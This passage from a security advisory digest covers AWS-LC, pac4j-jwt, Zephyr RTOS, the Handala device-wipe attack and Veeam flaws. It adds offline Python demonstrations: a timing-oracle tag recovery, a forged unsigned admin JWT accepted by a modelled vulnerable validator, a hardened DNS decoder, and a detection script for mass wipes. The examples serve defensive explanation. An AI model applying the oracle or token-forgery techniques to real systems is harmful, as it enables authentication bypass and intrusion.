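Why a timing difference in tag verification matters is easiest to see by driving it as an oracle. The script below is an added example for this digest, not AWS-LC code, and it does not implement AES-CCM: the tag is a constructed 16-byte value standing in for the CCM MAC, and the "oracle" returns how many bytes the comparison inspected, which is the quantity an attacker estimates from response time. Against an early-exit compare the attacker recovers the whole tag in at most 256 * 16 queries; against a constant-time compare every guess looks the same and the recovery loop gives up.

```python
import hashlib
import hmac


def compare_early_exit(candidate, tag):
    """Non-constant-time check: stops at the first mismatching byte.
    Returns (matched, bytes_inspected); the second value models the timing leak."""
    if len(candidate) != len(tag):
        return False, 0
    for i, (x, y) in enumerate(zip(candidate, tag)):
        if x != y:
            return False, i + 1
    return True, len(tag)


def compare_constant_time(candidate, tag):
    """Constant-time check: every byte is examined regardless of where mismatches sit."""
    return hmac.compare_digest(candidate, tag), len(tag)


def recover_tag(oracle, length):
    """Byte-at-a-time recovery against a comparison oracle.

    A guess whose prefix is right makes the early-exit compare walk further, so the
    attacker only needs to find, per position, the one byte value that advances the
    comparison. With a constant-time compare no value stands out and we return None."""
    guess = bytearray(length)
    for pos in range(length):
        for b in range(256):
            guess[pos] = b
            matched, inspected = oracle(bytes(guess))
            if matched or inspected > pos + 1:
                break  # the comparison got past this byte, so it is correct
        else:
            return None  # nothing advanced the comparison: the oracle leaks nothing
    return bytes(guess)


# Constructed stand-in for a 16-byte CCM authentication tag.
TAG = hashlib.sha256(b"constructed AES-CCM tag").digest()[:16]

if __name__ == "__main__":
    leaky = recover_tag(lambda g: compare_early_exit(g, TAG), len(TAG))
    safe = recover_tag(lambda g: compare_constant_time(g, TAG), len(TAG))
    print("early-exit compare recovered tag:", leaky == TAG)
    print("constant-time compare recovered tag:", safe is not None)
```

Real measurements are noisy, which raises the query count but not the principle; the fix on the library side is the same as in compare_constant_time, and the check on the application side is that decryption failures for a bad tag are reported after the full comparison, with no data-dependent early return.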
Affected Versions:
AWS-LC v1.41.0 to v1.68.x, AWS-LC-FIPS 3.0.0 to 3.1.x, aws-lc-sys v0.24.0 to v0.37.x, and aws-lc-sys-fips v0.13.0 to v0.13.11 depending on the vulnerability.
Mitigation:
Organizations using AWS-LC should upgrade to the patched versions AWS-LC v1.69.0 or later, AWS-LC-FIPS v3.2.0 or later, aws-lc-sys v0.38.0 or later, and aws-lc-sys-fips v0.13.12 or later to mitigate the identified vulnerabilities.
Reference:
https://aws.amazon.com/security/security-bulletins/rss/2026-005-aws/
- Critical Authentication Bypass Vulnerability in pac4j-jwt (CVE-2026-29000)
A critical vulnerability has been identified in pac4j-jwt, a widely used Java authentication library for handling JSON Web Tokens (JWT). The vulnerability could allow remote attackers to bypass authentication and forge administrative credentials under certain conditions.
The flaw, tracked as CVE-2026-29000 (CVSS 10.0 – Critical), exists in the JwtAuthenticator component when processing encrypted JWT tokens (JWE). Due to improper validation logic, the library may accept an unsigned token after decryption and skip the signature verification step. This could allow attackers to craft forged JWT tokens containing arbitrary user or administrator claims, potentially leading to authentication bypass and unauthorized privilege escalation.
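The logic error here is treating successful decryption as proof of authenticity. The model below is an added example written for this digest, not pac4j's code: JWS signing and verification are real HS256, but the JWE layer is a toy keystream XOR that exists only so a nested token can be wrapped and unwrapped offline (it is not a cipher, and the "dir" key is shared by both sides to keep the example short; in a deployment that encrypts to an RSA public key, anyone can produce such a JWE, which is what makes the flaw remotely exploitable). Keys and claims are constructed.

```python
import base64
import hashlib
import hmac
import json


def b64u(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64ud(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jws_sign(claims, key):
    header = b64u(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64u(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64u(sig)}"


def jws_verify(token, key):
    """Accept only HS256 with a valid MAC; alg none and bad signatures raise."""
    header, payload, sig = token.split(".")
    if json.loads(b64ud(header)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64ud(sig)):
        raise ValueError("bad signature")
    return json.loads(b64ud(payload))


def plain_jwt(claims):
    """Unsigned JWT (alg none, empty signature), as an attacker would build it."""
    return f'{b64u(json.dumps({"alg": "none"}).encode())}.{b64u(json.dumps(claims).encode())}.'


def _keystream_xor(data, key):
    # Toy stand-in for JWE content encryption so wrap/unwrap round-trip offline.
    # NOT a real cipher; never reuse outside this illustration.
    return bytes(b ^ hashlib.sha256(key + i.to_bytes(4, "big")).digest()[0]
                 for i, b in enumerate(data))


def jwe_wrap(inner_token, enc_key):
    """Nested JWT: compact JWE (5 parts) whose plaintext is another token."""
    header = b64u(json.dumps({"alg": "dir", "enc": "toy", "cty": "JWT"}).encode())
    return f"{header}...{b64u(_keystream_xor(inner_token.encode(), enc_key))}."


def jwe_unwrap(token, enc_key):
    header, _enc_key, _iv, ciphertext, _tag = token.split(".")
    return _keystream_xor(b64ud(ciphertext), enc_key).decode()


def authenticate_vulnerable(token, sig_key, enc_key):
    if token.count(".") != 4:
        return jws_verify(token, sig_key)  # a bare token must be a signed JWS
    inner = jwe_unwrap(token, enc_key)
    header, payload, sig = inner.split(".")
    if json.loads(b64ud(header)).get("alg") == "none" and sig == "":
        # FLAW: the decrypted token is trusted because decryption succeeded, so the
        # signature step is skipped. Encryption proves nothing about who wrote it.
        return json.loads(b64ud(payload))
    return jws_verify(inner, sig_key)


def authenticate_fixed(token, sig_key, enc_key):
    if token.count(".") == 4:
        token = jwe_unwrap(token, enc_key)
    # Whatever came out of decryption must still be a JWS that verifies.
    return jws_verify(token, sig_key)


SIG_KEY = b"constructed-hmac-key"  # constructed
ENC_KEY = b"constructed-enc-key"   # constructed; stands in for the recipient's key

if __name__ == "__main__":
    forged = jwe_wrap(plain_jwt({"sub": "admin", "roles": ["admin"]}), ENC_KEY)
    print("vulnerable accepts:", authenticate_vulnerable(forged, SIG_KEY, ENC_KEY))
    try:
        authenticate_fixed(forged, SIG_KEY, ENC_KEY)
    except ValueError as exc:
        print("fixed rejects:", exc)
```

When reviewing any nested-JWT validator, the question to ask is the one authenticate_fixed answers: is there a code path from "decrypted" to "claims" that never passes through signature verification with an allow-listed algorithm.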
Affected Versions:
pac4j-jwt 4.x before 4.5.9, 5.x before 5.7.9, and 6.x before 6.3.3.
Mitigation:
Organizations using pac4j-jwt should upgrade to the patched versions 4.5.9 or later (4.x branch), 5.7.9 or later (5.x branch), and 6.3.3 or later (6.x branch) and review authentication logs for suspicious token activity.
Reference:
https://nvd.nist.gov/vuln/detail/CVE-2026-29000
- Critical Remote Code Execution Vulnerability in Zephyr RTOS (CVE-2026-1678)
A critical vulnerability has been identified in Zephyr RTOS, an open-source real-time operating system widely used in IoT devices, embedded systems, sensors, wearables, and industrial gateways. The vulnerability affects the DNS resolver component and could allow unauthenticated remote attackers to execute arbitrary code on affected devices.
The flaw, tracked as CVE-2026-1678 (CVSS 9.4 – Critical), exists in the dns_unpack_name() function within the DNS parsing library. Improper memory boundary handling may allow attackers to send specially crafted DNS responses that trigger an out-of-bounds memory write, leading to memory corruption and potential remote code execution (RCE) on vulnerable devices.
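DNS name decoding is a small parser with several ways to go wrong: a label length that runs past the packet, a compression pointer that loops, and a decoded name longer than the caller's buffer (the last is the out-of-bounds write class named above). The decoder below is an added example for this digest, written in Python as a model of the checks a C implementation must make; it is not Zephyr's dns_unpack_name() and does not reproduce the advisory's trigger. The messages it parses are constructed, including three malformed ones it must reject.

```python
MAX_NAME = 255  # RFC 1035 limit on the encoded name; models the caller's buffer size


def unpack_name(msg, offset, max_out=MAX_NAME):
    """Decode a DNS name starting at msg[offset]. Returns (name, next_offset).
    Raises ValueError instead of reading or writing out of bounds."""
    labels, written = [], 0
    pos, end, seq_start = offset, None, offset
    while True:
        if pos >= len(msg):
            raise ValueError("name runs past end of message")
        length = msg[pos]
        if length == 0:
            pos += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer (two octets)
            if pos + 1 >= len(msg):
                raise ValueError("truncated pointer")
            target = ((length & 0x3F) << 8) | msg[pos + 1]
            # A pointer must land strictly before the sequence it was read from;
            # this makes every jump go backwards, so loops are impossible.
            if target >= seq_start:
                raise ValueError("pointer does not point strictly backwards")
            if end is None:
                end = pos + 2  # the name ends after the first pointer in the stream
            pos = seq_start = target
            continue
        if length & 0xC0:
            raise ValueError("reserved label type")
        # Here length <= 63 because the top two bits are clear.
        if pos + 1 + length > len(msg):
            raise ValueError("label runs past end of message")
        written += length + 1  # label octets plus the separator written for it
        if written > max_out:
            raise ValueError("decoded name exceeds output buffer")  # the OOB-write case
        labels.append(msg[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels), (end if end is not None else pos)


def rejects(msg, offset=12, max_out=MAX_NAME):
    """True if the decoder refuses the message instead of misbehaving."""
    try:
        unpack_name(msg, offset, max_out)
    except ValueError:
        return True
    return False


def _name(*labels):
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in labels) + b"\x00"


HEADER = bytes(12)  # constructed zeroed DNS header
# Question name at offset 12, QTYPE/QCLASS, then an answer name that is a pointer to 12.
VALID_MSG = HEADER + _name("www", "example", "com") + b"\x00\x01\x00\x01" + b"\xC0\x0C"
LOOP_MSG = HEADER + b"\x01a\xC0\x0C"               # "a" then a pointer back to itself
TRUNCATED_MSG = HEADER + b"\x3Fabc"                # claims 63 octets, only 3 present
OVERLONG_MSG = HEADER + _name(*["x" * 63] * 5)     # 5 x 64 octets > 255

if __name__ == "__main__":
    print(unpack_name(VALID_MSG, 12))
    print(unpack_name(VALID_MSG, 33))
    for bad in (LOOP_MSG, TRUNCATED_MSG, OVERLONG_MSG):
        print("rejected:", rejects(bad))
```

The two checks that map to the advisory's bug class are the one against len(msg) before every read and the running `written` total against the output size before every append; a C decoder that keeps only the first can still be driven to write past its destination buffer by a response with many long labels.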
Affected Systems:
Devices running Zephyr RTOS with the DNS resolver functionality enabled may be impacted.
Mitigation:
Organizations using Zephyr RTOS are advised to upgrade to the latest patched version where the DNS parsing logic has been hardened and monitor embedded devices for abnormal DNS activity.
Reference:
https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-536f-h63g-hj42
- Hacktivist Group “Handala” Conducts Large-Scale Device Wipe Using Legitimate MDM Tools
Hacktivist group Handala reportedly conducted a large-scale cyberattack against Stryker Corporation by abusing legitimate enterprise management tools rather than deploying traditional malware. The attackers allegedly compromised high-privilege Microsoft Entra (Azure AD) administrative accounts, enabling them to leverage Microsoft Intune’s Remote Wipe functionality through the Microsoft Graph API. The attack reportedly resulted in the wiping of approximately 200,000 devices including laptops, servers, and employee mobile devices, alongside claims of 50TB of data exfiltration.
The attack demonstrates a “Living-off-the-Land” (LotL) technique where legitimate administrative tools are weaponized to execute destructive actions while blending with normal administrative activity. By issuing wipe commands through trusted APIs, the activity could bypass many traditional malware-based detection mechanisms.
Key Behavioral Indicators:
- Sudden spikes in RemoteWipe or FactoryReset actions within Intune audit logs
- Unexpected assignment of Global Administrator or Intune Administrator roles to accounts that did not previously hold them
- Administrative logins from unusual geographical locations or suspicious VPN exit nodes
Mitigation:
Organizations should implement phishing-resistant MFA such as FIDO2 security keys, enforce Privileged Identity Management (PIM) with Just-In-Time administrative access, restrict administrative access through Conditional Access policies, and configure SIEM alerts for abnormal device wipe activity or mass administrative actions.
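The indicators above reduce to two detections: a burst of destructive device actions from one actor, and a privileged role assignment. The script below is an added example written for this digest, not a product rule and not from any report on the incident; the events are constructed and use a simplified, normalised shape (time, actor, action, target). In practice the wipe events come from Intune audit events (Microsoft Graph deviceManagement/auditEvents) and the role events from the Entra ID directory audit log, whose field names differ and must be mapped onto this shape first.

```python
from collections import deque
from datetime import datetime, timedelta

WIPE_ACTIONS = {"wipe", "factoryreset"}
PRIVILEGED_ROLES = {"Global Administrator", "Intune Administrator", "Privileged Role Administrator"}

# Constructed, normalised events: one role assignment followed by six wipes in
# five minutes from the same account, and routine helpdesk activity for contrast.
EVENTS = [
    {"time": "2026-03-12T01:55:00+00:00", "actor": "breakglass@example.com",
     "action": "Add member to role", "target": "Intune Administrator"},
    *[{"time": f"2026-03-12T02:0{i}:00+00:00", "actor": "breakglass@example.com",
       "action": "Wipe", "target": f"LAPTOP-{i:04d}"} for i in range(6)],
    {"time": "2026-03-12T09:00:00+00:00", "actor": "helpdesk@example.com",
     "action": "Wipe", "target": "LAPTOP-LOST1"},
    {"time": "2026-03-12T09:05:00+00:00", "actor": "helpdesk@example.com",
     "action": "Add member to role", "target": "Helpdesk Administrator"},
]


def detect(events, threshold=5, window=timedelta(minutes=10)):
    """Alert on (a) an actor issuing `threshold` wipe/factory-reset commands inside
    `window`, fired once when the threshold is reached, and (b) any assignment to a
    privileged role. Returns alerts in event-time order."""
    alerts = []
    recent = {}  # actor -> timestamps of that actor's recent destructive actions
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        action = ev["action"].replace(" ", "").lower()
        if action in WIPE_ACTIONS:
            q = recent.setdefault(ev["actor"], deque())
            q.append(when)
            while when - q[0] > window:  # drop actions that fell out of the window
                q.popleft()
            if len(q) == threshold:
                alerts.append(("mass_wipe", ev["actor"], f"{threshold} wipes within {window}"))
        elif action == "addmembertorole" and ev["target"] in PRIVILEGED_ROLES:
            alerts.append(("privileged_role_assignment", ev["actor"], ev["target"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The threshold and window are the tunables: a single lost-laptop wipe from the helpdesk should not fire, while a handful of wipes in minutes from any one identity, and certainly from one that was just made an Intune Administrator, should page someone who can revoke the session and the role assignment.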
- Critical Remote Code Execution Vulnerabilities in Veeam Backup & Replication
Veeam has released security updates addressing multiple critical vulnerabilities in Veeam Backup & Replication (VBR) that could allow attackers to execute remote code on vulnerable backup servers. VBR is widely used enterprise backup and disaster recovery software, making it a high-value target for attackers seeking access to critical infrastructure and backup data.
Several critical vulnerabilities were identified, including CVE-2026-21666, CVE-2026-21667, and CVE-2026-21669, which allow low-privileged domain users to execute remote code on backup servers through low-complexity attacks. Another vulnerability, CVE-2026-21708, could allow a Backup Viewer account to achieve remote code execution with postgres user privileges.
In addition to these critical flaws, Veeam also patched several high-severity vulnerabilities that could allow attackers to escalate privileges on Windows-based VBR servers, extract stored SSH credentials, and bypass restrictions to manipulate files on backup repositories.
Veeam Backup & Replication servers are frequently targeted in ransomware campaigns, as compromising backup infrastructure can allow attackers to disable recovery capabilities, perform lateral movement across networks, and exfiltrate sensitive data. Threat groups such as FIN7, Cuba ransomware, and other ransomware operators have previously exploited vulnerabilities in VBR environments.
Affected Systems:
Veeam Backup & Replication installations running versions prior to 12.3.2.4465 and 13.0.1.2067.
Mitigation:
Organizations are strongly advised to upgrade Veeam Backup & Replication to versions 12.3.2.4465 or 13.0.1.2067 or later, apply all security patches, and monitor backup infrastructure for suspicious activity or unauthorized access attempts.